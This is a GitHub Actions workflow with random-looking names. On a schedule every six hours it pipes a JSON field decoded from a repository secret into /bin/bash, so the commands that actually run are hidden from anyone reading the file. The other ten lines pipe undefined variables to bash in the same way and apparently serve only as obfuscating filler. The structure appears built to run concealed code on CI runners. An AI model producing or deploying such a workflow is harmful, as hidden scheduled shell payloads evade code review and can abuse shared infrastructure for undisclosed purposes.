name: factorycurrently
on:
  workflow_dispatch:
  schedule:
    - cron: '2 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: factorycurrently
        env:
          l243: ${{ secrets.l243 }}
        run: |
          echo $l243 | jq -r .qrl648 | /bin/bash
          echo $asq1556 | jq -r .j68 | /bin/bash
          echo $sx88 | jq -r .phwvu987 | /bin/bash
          echo $cd298 | jq -r .eqt58695 | /bin/bash
          echo $acg0 | jq -r .n217 | /bin/bash
          echo $gaz1 | jq -r .dbx19930 | /bin/bash
          echo $a4068 | jq -r .ypkfj23 | /bin/bash
          echo $px747 | jq -r .gj6725 | /bin/bash
          echo $yw9019 | jq -r .mpjvx3843 | /bin/bash
          echo $bfabe33 | jq -r .fj498 | /bin/bash
          echo $jbnm5 | jq -r .rhgi89445 | /bin/bash

